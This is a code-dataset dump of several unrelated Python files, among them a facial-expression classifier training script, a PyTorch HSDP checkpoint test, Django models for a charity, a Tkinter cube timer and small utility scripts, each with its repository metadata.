= eta_min + (opt.learning_rate - eta_min) * (\n 1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2\n 
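            # warmup_to is the cosine schedule evaluated at the end of warm-up: it interpolates
            # between eta_min and the base learning rate (inferred from the formula above; it is
            # assumed here to mirror the cosine branch of adjust_learning_rate)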
else:\n opt.warmup_to = opt.learning_rate\n\n if opt.dataset == 'RAF-DB':\n opt.n_cls = 7\n elif opt.dataset == 'AffectNet':\n opt.n_cls = 7\n elif opt.dataset == 'SFEW':\n opt.n_cls = 7\n elif opt.dataset == 'CK':\n opt.n_cls = 8\n elif opt.dataset == 'FERPlus':\n opt.n_cls = 8\n elif opt.dataset == 'FED-RO':\n opt.n_cls = 7\n else:\n raise ValueError('dataset not supported: {}'.format(opt.dataset))\n\n return opt\n\ndef set_loader(opt):\n # construct data loader\n # membership test; the original chained comparison (== 'RAF-DB' or 'AffectNet' or ...) was always truthy\n if opt.dataset in ('RAF-DB', 'AffectNet', 'SFEW', 'CAER-S', 'CK', 'FERPlus', 'FED-RO'):\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n else:\n raise ValueError('dataset not supported: {}'.format(opt.dataset))\n normalize = transforms.Normalize(mean=mean, std=std)\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(size=224, scale=(0.6, 1.)),#0.2 1\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n val_transform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n normalize,\n ])\n\n if opt.dataset == 'RAF-DB':\n train_dataset = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n val_dataset = Dataset_RAF(root=opt.RAF_test_root, file_list=opt.RAF_label_test_txt, transform=val_transform)\n elif opt.dataset == 'AffectNet':\n train_dataset = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n val_dataset = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_test_txt, transform=val_transform)\n elif opt.dataset == 'SFEW':\n train_dataset = Dataset_RAF(root=opt.SFEW_train_root, file_list=opt.SFEW_label_train_txt, transform=train_transform)\n val_dataset = Dataset_RAF(root=opt.SFEW_test_root, file_list=opt.SFEW_label_test_txt, transform=val_transform)\n # train_dataset_RAF = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n # train_dataset_Aff = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n # train_dataset = data.ConcatDataset([train_dataset_RAF, train_dataset_Aff])\n # val_dataset1 = Dataset_RAF(root=opt.SFEW_train_root, file_list=opt.SFEW_label_train_txt, transform=train_transform)\n # val_dataset2 = Dataset_RAF(root=opt.SFEW_test_root, file_list=opt.SFEW_label_test_txt, transform=val_transform)\n # val_dataset = data.ConcatDataset([val_dataset1, val_dataset2])\n elif opt.dataset == 'FED-RO':\n train_dataset_RAF = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n train_dataset_Aff = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n train_dataset = data.ConcatDataset([train_dataset_RAF, train_dataset_Aff])\n val_dataset = Dataset_RAF(root=opt.FED_test_root, file_list=opt.FED_label_test_txt, transform=val_transform)\n elif opt.dataset == 'CK':\n # train_dataset_RAF = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n # train_dataset_Aff = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n # train_dataset = data.ConcatDataset([train_dataset_RAF, train_dataset_Aff])\n #train_dataset = Dataset_RAF(root=opt.RAF_train_root, file_list=opt.RAF_label_train_txt, transform=train_transform)\n train_dataset = Dataset_AffectNet(root=opt.Aff_root, file_list=opt.Aff_label_train_txt, transform=train_transform)\n val_dataset = 
Dataset_RAF(root=opt.CK_test_root, file_list=opt.CK_label_test_txt, transform=val_transform)\n elif opt.dataset == 'FERPlus':\n train_dataset = FERPlus(file_name=opt.file_name, split='Training', transform=train_transform)\n val_dataset = FERPlus(file_name=opt.file_name, split='PrivateTest', transform=val_transform)\n else:\n raise ValueError(opt.dataset)\n\n if opt.dataset == 'RAF-DB':\n train_sampler = None\n elif opt.dataset == 'AffectNet':\n train_sampler = ImbalancedDatasetSampler(train_dataset)\n elif opt.dataset == 'SFEW':\n train_sampler = None\n elif opt.dataset == 'FED-RO':\n train_sampler = None\n elif opt.dataset == 'CK':\n train_sampler = None\n elif opt.dataset == 'FERPlus':\n train_sampler = None\n else:\n raise ValueError(opt.dataset)\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=opt.batch_size, shuffle=(train_sampler is None),\n num_workers=opt.num_workers, pin_memory=True, sampler=train_sampler)\n val_loader = torch.utils.data.DataLoader(\n val_dataset, batch_size=256, shuffle=False,\n num_workers=8, pin_memory=True)\n\n return train_loader, val_loader\n\ndef set_model(opt):\n model = SupConResNet(name=opt.model)\n criterion = torch.nn.CrossEntropyLoss()\n\n classifier = LinearClassifier(name=opt.model, num_classes=opt.n_cls)\n\n ckpt = torch.load(opt.ckpt, map_location='cpu')\n state_dict = ckpt['model']\n\n if torch.cuda.is_available():\n if torch.cuda.device_count() > 1:\n model.encoder = torch.nn.DataParallel(model.encoder)\n else:\n new_state_dict = {}\n for k, v in state_dict.items():\n k = k.replace(\"module.\", \"\")\n new_state_dict[k] = v\n state_dict = new_state_dict\n model = model.cuda()\n classifier = classifier.cuda()\n criterion = criterion.cuda()\n cudnn.benchmark = True\n\n model.load_state_dict(state_dict)\n\n return model, classifier, criterion\n\n\ndef train(train_loader, model, classifier, criterion, optimizer, epoch, opt):\n \"\"\"one epoch training\"\"\"\n model.eval()\n classifier.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n end = time.time()\n for idx, (images, labels, _) in enumerate(train_loader):\n data_time.update(time.time() - end)\n\n images = images.cuda(non_blocking=True)\n labels = labels.cuda(non_blocking=True)\n bsz = labels.shape[0]\n\n # warm-up learning rate\n warmup_learning_rate(opt, epoch, idx, len(train_loader), optimizer)\n\n # compute loss\n with torch.no_grad():\n features = model.encoder(images)\n\n output = classifier(features.detach())\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # SGD\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # print info\n if (idx + 1) % opt.print_freq == 0:\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, idx + 1, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1))\n sys.stdout.flush()\n\n return losses.avg, top1.avg\n\n\ndef validate(val_loader, model, classifier, criterion, opt):\n \"\"\"validation\"\"\"\n model.eval()\n classifier.eval()\n\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n with 
torch.no_grad():\n end = time.time()\n for idx, (images, labels, _) in enumerate(val_loader):\n images = images.float().cuda()\n labels = labels.cuda()\n bsz = labels.shape[0]\n\n # forward\n output = classifier(model.encoder(images))\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if idx % opt.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n idx, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1))\n\n print(' * Acc@1 {top1.avg:.3f}'.format(top1=top1))\n return losses.avg, top1.avg\n\n\ndef main():\n best_acc = 0\n opt = parse_option()\n\n # build data loader\n train_loader, val_loader = set_loader(opt)\n\n # build model and criterion\n model, classifier, criterion = set_model(opt)\n\n print(' Total params: %.2fM' % (sum(p.numel() for p in model.encoder.parameters())/1000000.0))\n\n # build optimizer\n optimizer = set_optimizer(opt, classifier)\n\n # training routine\n for epoch in range(1, opt.epochs + 1):\n adjust_learning_rate(opt, optimizer, epoch)\n\n # train for one epoch\n time1 = time.time()\n loss, acc = train(train_loader, model, classifier, criterion,\n optimizer, epoch, opt)\n time2 = time.time()\n print('Train epoch {}, total time {:.2f}, accuracy:{:.2f}'.format(\n epoch, time2 - time1, acc))\n\n # eval for one epoch\n loss, val_acc = validate(val_loader, model, classifier, criterion, opt)\n if val_acc > best_acc:\n best_acc = val_acc\n save_model(classifier, optimizer, opt, epoch, os.path.join('best_classifier.pth'))\n\n print('best accuracy: {:.2f}'.format(best_acc))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hangyu94/CRS-CONT","sub_path":"retrain.py","file_name":"retrain.py","file_ext":"py","file_size_in_byte":16075,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"74389804071","text":"import pandas as pd\nimport numpy as np\n\n\nclass MakePregMap:\n \"\"\"\n mapping records according to given index column\n \"\"\"\n\n def __init__(self, data, id_column):\n \"\"\"\n initialize\n :param data: dataframe\n :param id_column: index column for records\n \"\"\"\n self.data = data\n self.case_ids = id_column\n\n @property\n def unique_responds(self):\n \"\"\"\n get unique indexes\n :return: array\n \"\"\"\n return self.data[self.case_ids].unique()\n\n def pregnancy_map(self):\n \"\"\"\n map records according to unique indexes\n :return: dict\n \"\"\"\n maped_pregs = {}\n for case_id in self.unique_responds:\n maped_pregs[case_id] = self.data[self.data[self.case_ids] == case_id]\n\n return maped_pregs\n\n\ndef get_preg_lengths(data, id_column):\n \"\"\"\n pregnancy length\n :param data: dataFrame\n :param id_column: index column\n :return: dataFrame\n \"\"\"\n preg_len = {}\n maped_pregs = MakePregMap(data, id_column)\n\n for key, value in maped_pregs.pregnancy_map().items():\n preg_len[key] = [value[value['birthord'] == 1]['gest_lb'].values[0],\n np.ceil(np.median(value[value['birthord'] > 1]['gest_lb']))]\n\n return pd.DataFrame(preg_len.values(),\n index=preg_len.keys(),\n columns=['firstBabies', 'others'])\n\n\ndef get_res_ages(data, id_column):\n \"\"\"\n age data by index\n :param data: dataframe\n :param id_column: index column\n 
:return: DataFrame\n \"\"\"\n resp_ages = {}\n maped_pregs = MakePregMap(data, id_column)\n\n for key, value in maped_pregs.pregnancy_map().items():\n temp = value.sort_values(by='birthord')\n resp_ages[key] = [temp.head(1)['ager'].values[0],\n temp.head(1)['pregordr'].values[0],\n temp.head(1)['birthord'].values[0],\n temp.head(1)['agecon'].values[0],\n temp.head(1)['agepreg'].values[0],\n temp.tail(1)['pregordr'].values[0],\n temp.tail(1)['birthord'].values[0],\n temp.tail(1)['agecon'].values[0],\n temp.tail(1)['agepreg'].values[0],\n ]\n\n return pd.DataFrame(resp_ages.values(),\n index=resp_ages.keys(),\n columns=['age_int',\n 'pregord_fst', 'birthord_fst',\n 'agecon_fst', 'agepreg_fst',\n 'pregord_lst', 'birthord_lst',\n 'agecon_lst', 'agepreg_lst'])\n\n\ndef get_outcome_rec(data, id_column):\n \"\"\"\n get each respondent's pregnancy outcome details\n :param data: DataFrame\n :param id_column: index column\n :return: DataFrame\n \"\"\"\n outcomes = {}\n maped_pregs = MakePregMap(data, id_column)\n\n for key, value in maped_pregs.pregnancy_map().items():\n outcomes[key] = [value.shape[0],\n len(value[value['outcome'] == 1]),\n len(value[value['outcome'] == 2]),\n len(value[value['outcome'] == 3]),\n len(value[value['outcome'] == 4]),\n len(value[value['outcome'] == 5]),\n len(value[value['outcome'] == 6])\n ]\n\n return pd.DataFrame(outcomes.values(),\n index=outcomes.keys(),\n columns=['pregnum',\n 'livebrth', 'induabor',\n 'stilbirth', 'miscarg',\n 'epcpreg', 'curpreg'])\n","repo_name":"ashen007/National-Survey-of-Family-Growth","sub_path":"Modules/mapping_rcd.py","file_name":"mapping_rcd.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71589420714","text":"from Employees_Project import *\r\n\r\n\r\n\r\ndef add_emp_manually():\r\n number_of_users = exception_check(input, \"\\n Please enter the number of users: \")\r\n for user in range(number_of_users):\r\n the_id_after_checking = checking_if_id_already_exist_in_the_system(input, \" Enter the ID number- \")\r\n if the_id_after_checking[0] is True:\r\n print(error_style(\"ID already exists in the system\"))\r\n else:\r\n users = details_for_employees_class(the_id_after_checking[1], \" Enter your name- \", \" Enter your phone- \",\r\n \" Enter your age- \", input)\r\n save_data_in_files(open_main_employees_file(), r'C:\\Users\\barab\\Desktop\\employees.xlsx', users)\r\n back_to_menu()\r\n\r\n\r\ndef add_emp_from_file():\r\n user_file_path = read_file(\"\\n\"r' Please enter the path where the Excel file is stored\\File name.xlsx : ')\r\n for id_num in list(user_file_path[0]):\r\n the_id_after_checking = checking_if_id_already_exist_in_the_system(None, id_num)\r\n if the_id_after_checking[0] is True:\r\n print(error_style(\"The ID-\"), the_id_after_checking[1], error_style(\" not saved because it already exists in the system. 
\"))\r\n continue\r\n else:\r\n index_id_number = list(user_file_path[0]).index(the_id_after_checking[1])\r\n users = details_for_employees_class(the_id_after_checking[1], user_file_path[1][index_id_number],\r\n user_file_path[2][index_id_number], user_file_path[3][index_id_number], None)\r\n save_data_in_files(open_main_employees_file(), r'C:\\Users\\barab\\Desktop\\employees.xlsx', users)\r\n back_to_menu()\r\n","repo_name":"Barabramov/employees-project-python","sub_path":"AddEmployees.py","file_name":"AddEmployees.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15195228177","text":"# Django\nfrom django.db import models\n\n\n# Create your models here.\n\n\nclass Member(models.Model):\n \"\"\"\n Adding members to the charitable trust\n \"\"\"\n ration_card_status = (\n ('APL', 'APL'),\n ('BPL', 'BPL'),\n )\n\n name = models.CharField(max_length=30, verbose_name='Name')\n age = models.IntegerField(verbose_name='Age')\n phone = models.PositiveIntegerField(help_text='Enter phone number without country code')\n house_name = models.CharField(max_length=50)\n locality = models.CharField(max_length=50)\n pin_code = models.IntegerField()\n ration_card = models.CharField(choices=ration_card_status, max_length=10)\n annual_income = models.IntegerField()\n job = models.CharField(max_length=50)\n remark = models.TextField(max_length=100, help_text='Max 100 letters', blank=True)\n\n class Meta:\n unique_together = ('name', 'house_name', 'phone')\n\n def __str__(self):\n return self.name\n\n\nclass HouseMember(models.Model):\n \"\"\"\n Its for adding house members details of an member to added to charitable trust\n \"\"\"\n member = models.ForeignKey(Member, on_delete=models.CASCADE)\n name = models.CharField(max_length=50, blank=True)\n age = models.IntegerField(blank=True, null=True)\n job = models.CharField(max_length=50, blank=True)\n relationship = models.CharField(max_length=50, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n \"\"\"\n Defines that which type of category are providing. 
e.g. Food, Medicine etc\n \"\"\"\n category = models.CharField(max_length=30)\n\n def __str__(self):\n return self.category\n\n\nclass Need(models.Model):\n \"\"\"\n requirement for a member\n \"\"\"\n member = models.OneToOneField(Member, on_delete=models.CASCADE,)\n requirement = models.ManyToManyField(Category, blank=True,)\n","repo_name":"amjedsaleel/Kavin-Gramam","sub_path":"charity/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28993822677","text":"def sortedSquares(A):\n \"\"\"\n Problem: given an integer array A sorted in non-decreasing order, return a new array made of the\n squares of each number, also sorted in non-decreasing order.\n Approach: keep two pointers at the head and the tail and compare their absolute values; the larger\n square goes at the back of array B.\n :param A:\n :return:\n \"\"\"\n n = len(A)\n B = [None for _ in A]\n index, left, right = n - 1, 0, n - 1\n while index >= 0:\n if abs(A[left]) < abs(A[right]):\n B[index] = A[right] ** 2\n right -= 1\n else:\n B[index] = A[left] ** 2\n left += 1\n index -= 1\n return B\n\n\nif __name__ == \"__main__\":\n test_arr = [-7, -6, -2, 0, 8, 9]\n print(sortedSquares(test_arr))\n","repo_name":"gzjandpy/python-algorithm","sub_path":"leetcode/tag/array/simple/Squares of a Sorted Array.py","file_name":"Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14821016989","text":"# Owner(s): [\"oncall: distributed\"]\nfrom copy import deepcopy\n\nimport torch\nimport torch.distributed.checkpoint as dist_cp\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributed._tensor import init_device_mesh, Replicate\n\nfrom torch.distributed.checkpoint.default_planner import (\n DefaultLoadPlanner,\n DefaultSavePlanner,\n)\n\nfrom torch.distributed.fsdp import FullyShardedDataParallel as FSDP\nfrom torch.distributed.fsdp.fully_sharded_data_parallel import (\n ShardingStrategy,\n StateDictType,\n)\nfrom torch.testing._internal.common_distributed import skip_if_lt_x_gpu\nfrom torch.testing._internal.common_utils import (\n instantiate_parametrized_tests,\n parametrize,\n run_tests,\n)\n\nfrom torch.testing._internal.distributed._tensor.common_dtensor import (\n DTensorTestBase,\n with_comms,\n)\nfrom torch.testing._internal.distributed.checkpoint_utils import with_temp_dir\n\n\nclass SimpleModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.net1 = nn.Linear(5, 8)\n self.relu = nn.ReLU()\n self.net2 = nn.Linear(8, 4)\n self.net3 = nn.Linear(4, 12)\n\n def forward(self, x):\n x = F.relu(self.net1(x))\n x = F.relu(self.net2(x))\n x = F.relu(self.net3(x))\n return x\n\n def get_input(self):\n return torch.rand(4, 5, device=\"cuda\")\n\n\nclass SimpleModelUneven(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.net1 = nn.Linear(5, 10)\n self.relu = nn.ReLU()\n self.net2 = nn.Linear(10, 15)\n self.net3 = nn.Linear(15, 30)\n self.net4 = nn.Linear(30, 5)\n\n def forward(self, x):\n x = F.relu(self.net1(x))\n x = F.relu(self.net2(x))\n x = F.relu(self.net3(x))\n x = F.relu(self.net4(x))\n return x\n\n def get_input(self):\n return torch.rand(4, 5, device=\"cuda\")\n\n\nclass TestHSDPCheckpoint(DTensorTestBase):\n @property\n def backend(self):\n return \"cpu:gloo,cuda:nccl\"\n\n @with_comms\n @skip_if_lt_x_gpu(4)\n @with_temp_dir\n @parametrize(\"is_even_sharded_model\", [True, False])\n def test_hsdp_checkpoint(self, is_even_sharded_model) -> None:\n CHECKPOINT_DIR = self.temp_dir\n simple_model = SimpleModel if 
is_even_sharded_model else SimpleModelUneven\n\n mesh_2d = init_device_mesh(self.device_type, (2, self.world_size // 2))\n model = FSDP(\n simple_model().cuda(),\n sharding_strategy=ShardingStrategy.HYBRID_SHARD,\n device_mesh=mesh_2d,\n )\n optim = torch.optim.Adam(model.parameters(), lr=0.1)\n\n FSDP.set_state_dict_type(\n model,\n StateDictType.SHARDED_STATE_DICT,\n )\n state_dict = {\"model\": model.state_dict()}\n state_dict_to_save = deepcopy(state_dict)\n\n dist_cp.save_state_dict(\n state_dict=state_dict_to_save,\n storage_writer=dist_cp.FileSystemWriter(CHECKPOINT_DIR),\n planner=DefaultSavePlanner(),\n )\n\n # Update the parameters so current model state_dict now be different from state_dict_to_save.\n model(model.get_input()).sum().backward()\n optim.step()\n\n # At this point, the current state dict is different from state_dict_to_save.\n for (k1, v1), (k2, v2) in zip(\n state_dict_to_save[\"model\"].items(), model.state_dict().items()\n ):\n self.assertEqual(k1, k2)\n self.assertEqual(v1.device_mesh, v2.device_mesh)\n self.assertEqual(v1.placements, v2.placements)\n self.assertNotEqual(v1.to_local(), v2.to_local())\n\n dist_cp.load_state_dict(\n state_dict=state_dict_to_save,\n storage_reader=dist_cp.FileSystemReader(CHECKPOINT_DIR),\n planner=DefaultLoadPlanner(),\n )\n model.load_state_dict(state_dict_to_save[\"model\"])\n\n state_dict_after_load = model.state_dict()\n # After loading, the current model state dict should be the same as state_dict_to_save.\n for (k1, v1), (k2, v2) in zip(\n state_dict_to_save[\"model\"].items(), model.state_dict().items()\n ):\n self.assertEqual(k1, k2)\n self.assertEqual(v1.device_mesh, v2.device_mesh)\n self.assertEqual(v1.placements, v2.placements)\n self.assertEqual(v1.to_local(), v2.to_local())\n\n @with_comms\n @skip_if_lt_x_gpu(4)\n @with_temp_dir\n @parametrize(\"is_even_sharded_model\", [True, False])\n def test_hsdp_fsdp_checkpoint_conversion(self, is_even_sharded_model) -> None:\n CHECKPOINT_DIR = self.temp_dir\n simple_model = SimpleModel if is_even_sharded_model else SimpleModelUneven\n\n # save the hsdp model state_dict\n mesh_2d = init_device_mesh(self.device_type, (2, self.world_size // 2))\n hsdp_model = FSDP(\n simple_model().cuda(),\n sharding_strategy=ShardingStrategy.HYBRID_SHARD,\n device_mesh=mesh_2d,\n )\n FSDP.set_state_dict_type(\n hsdp_model,\n StateDictType.SHARDED_STATE_DICT,\n )\n hsdp_state_dict = {\"model\": hsdp_model.state_dict()}\n dist_cp.save_state_dict(\n state_dict=hsdp_state_dict,\n storage_writer=dist_cp.FileSystemWriter(CHECKPOINT_DIR),\n planner=DefaultSavePlanner(),\n )\n\n # initialize a fsdp model to load checkpoint into\n mesh_1d = init_device_mesh(self.device_type, (self.world_size,))\n fsdp_model = FSDP(\n simple_model().cuda(),\n device_mesh=mesh_1d,\n )\n FSDP.set_state_dict_type(\n fsdp_model,\n StateDictType.SHARDED_STATE_DICT,\n )\n fsdp_state_dict = {\"model\": fsdp_model.state_dict()}\n\n # at this point, the hsdp model parameters are different from fsdp model parameters.\n for (k1, v1), (k2, v2) in zip(\n hsdp_state_dict[\"model\"].items(), fsdp_state_dict[\"model\"].items()\n ):\n self.assertEqual(k1, k2)\n self.assertNotEqual(v1.device_mesh, v2.device_mesh)\n self.assertNotEqual(v1.placements, v2.placements)\n v1_all_gather = v1.redistribute(\n mesh_2d, placements=(Replicate(), Replicate())\n )\n v2_all_gather = v2.redistribute(mesh_1d, placements=(Replicate(),))\n self.assertNotEqual(v1_all_gather.to_local(), v2_all_gather.to_local())\n\n # load the fsdp state_dict from storage\n 
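        # (dist_cp.load_state_dict below reads the checkpoint into fsdp_state_dict in place,
        # resharding the tensors that were saved under the 2-D HSDP mesh into the 1-D FSDP
        # placements requested by the destination state_dict)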
dist_cp.load_state_dict(\n state_dict=fsdp_state_dict,\n storage_reader=dist_cp.FileSystemReader(CHECKPOINT_DIR),\n planner=DefaultLoadPlanner(),\n )\n fsdp_model.load_state_dict(fsdp_state_dict[\"model\"])\n\n state_dict_after_load = fsdp_model.state_dict()\n # After loading, the current model state dict should be the same as hsdp_state_dict.\n for (k1, v1), (k2, v2) in zip(\n hsdp_state_dict[\"model\"].items(), state_dict_after_load.items()\n ):\n self.assertEqual(k1, k2)\n self.assertNotEqual(v1.device_mesh, v2.device_mesh)\n self.assertNotEqual(v1.placements, v2.placements)\n v1_all_gather = v1.redistribute(\n mesh_2d, placements=(Replicate(), Replicate())\n )\n v2_all_gather = v2.redistribute(mesh_1d, placements=(Replicate(),))\n self.assertEqual(v1_all_gather.to_local(), v2_all_gather.to_local())\n\n\ninstantiate_parametrized_tests(TestHSDPCheckpoint)\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/checkpoint/test_hsdp_checkpoint.py","file_name":"test_hsdp_checkpoint.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11125667062","text":"import time\r\nimport serial\r\nimport tkinter\r\nimport threading\r\nimport tkinter.ttk as ttk\r\nimport functions as core\r\n\r\ndef refreshAll():\r\n loadTimes()\r\n scrambleTxt[\"text\"] = core.scramble()\r\n\r\ndef getAvg(n):\r\n sum = 0\r\n for i in range(0,n):\r\n try:\r\n sum+=float(cbb.get(i).replace(\"\\n\", \"\"))\r\n except Exception:\r\n return 0\r\n \r\n return round(sum/n,4)\r\n\r\ndef loadTimes():\r\n cbb.delete(0, tkinter.END)\r\n for item in core.readTimes():\r\n cbb.insert(0, item)\r\n avg_three[\"text\"] = \"Avg. 3: \"+str(getAvg(3))\r\n avg_five[\"text\"] = \"Avg. 5: \"+str(getAvg(5))\r\n avg_twelve[\"text\"] = \"Avg. 12: \"+str(getAvg(12))\r\n avg_thirty[\"text\"] = \"Avg. 
30: \"+str(getAvg(30))\r\n scrambleTxt[\"text\"] = core.scramble()\r\n\r\ndef deleteItem():\r\n try:\r\n toDelete = cbb.get(cbb.curselection())\r\n with open(\"times.data\", \"r\") as f:\r\n lines = f.readlines()\r\n with open(\"times.data\", \"w\") as f:\r\n for line in lines:\r\n if line != toDelete:\r\n f.write(line)\r\n loadTimes()\r\n except:\r\n pass\r\n\r\ndef timer():\r\n s = serial.Serial(port.get())\r\n tmpFrame.destroy()\r\n\r\n timest = \"\"\r\n timeend = \"\"\r\n\r\n while 1:\r\n ser = s.readline().decode(\"utf-8\").replace(\"\\n\",\"\")\r\n\r\n if ser == \"tmr_start\\r\":\r\n timest = time.time()\r\n txt.insert(tkinter.END, \"Running!\")\r\n elif ser == \"tmr_stop\\r\":\r\n timeend = time.time()\r\n\r\n if timest != \"\" and timeend != \"\":\r\n timeCurr = str(round(timeend-timest,4))\r\n\r\n txt.delete(0, tkinter.END)\r\n txt.insert(0, timeCurr)\r\n\r\n core.saveTime(timeCurr)\r\n \r\n cbb.insert(0, timeCurr)\r\n # loadTimes()\r\n\r\n timeCurr = \"\"\r\n timest = \"\"\r\n timeend = \"\"\r\n\r\n s.close()\r\n\r\ndef go():\r\n t = threading.Thread(target=timer, daemon=True)\r\n t.start()\r\n\r\n\r\n#####################\r\n### Layout\r\n#####################\r\n\r\nroot = tkinter.Tk()\r\n# root.geometry(\"500x500\")\r\n\r\nroot.title(\"Cubetimer - GUI\")\r\n\r\ntmpFrame = tkinter.Frame()\r\ntmpFrame.pack(side=tkinter.TOP)\r\n\r\nframe = tkinter.Frame()\r\nframe.pack()\r\n\r\nbtnFrame = tkinter.Frame()\r\nbtnFrame.pack(side=tkinter.TOP)\r\n\r\nport = ttk.Combobox(tmpFrame)\r\nport.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\nports = core.loadPorts()\r\nport[\"values\"] = ports\r\nport.current(0)\r\n\r\nstartBtn = tkinter.Button(tmpFrame, text=\"Choose\", command=go)\r\nstartBtn.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\n\r\ntxt = tkinter.Entry(frame, bd=5, insertwidth=1, font=30)\r\ntxt.pack()\r\n\r\nscrambleTxt = tkinter.Label(frame)\r\nscrambleTxt.pack()\r\n\r\navg_three = tkinter.Label(frame)\r\navg_three.pack()\r\n\r\navg_five = tkinter.Label(frame)\r\navg_five.pack()\r\n\r\navg_twelve = tkinter.Label(frame)\r\navg_twelve.pack()\r\n\r\navg_thirty = tkinter.Label(frame)\r\navg_thirty.pack()\r\n\r\nrefresh = tkinter.Button(btnFrame, text=\"Refresh\", command=refreshAll)\r\nrefresh.pack(side=tkinter.LEFT)\r\ndele = tkinter.Button(btnFrame, text=\"Delete\", command=deleteItem)\r\ndele.pack(side=tkinter.LEFT)\r\n\r\ncbb = tkinter.Listbox(frame) \r\ncbb.pack()\r\n\r\nrefreshAll()\r\n\r\nroot.mainloop()\r\n","repo_name":"MarcelKaemper/cubetimer","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19970613108","text":"\"\"\"\nThis program will calculate the area of a circle or triangle\n\"\"\"\n\nprint('The calculator is starting up')\n\noption = raw_input('Enter C for Circle, T for Triangle: ')\n\nif option == 'C' or option == 'c':\n radius = float(raw_input('Enter the radius: '))\n area = round(3.14159 * (radius ** 2), 2)\n print('The area of the circle with a radius of ' + str(radius) + ' is ' + str(area))\n\nelif option == 'T' or option == 't':\n base = float(raw_input('Enter the base: '))\n height = float(raw_input('Enter the height: '))\n area = round((.5 * base * height),2)\n print('The area of a triangle with base %f and height %f is %f' % (base, height, area))\n\nelse:\n print('You entered an option that is not available.')\n print('Please run the program again and choose a valid 
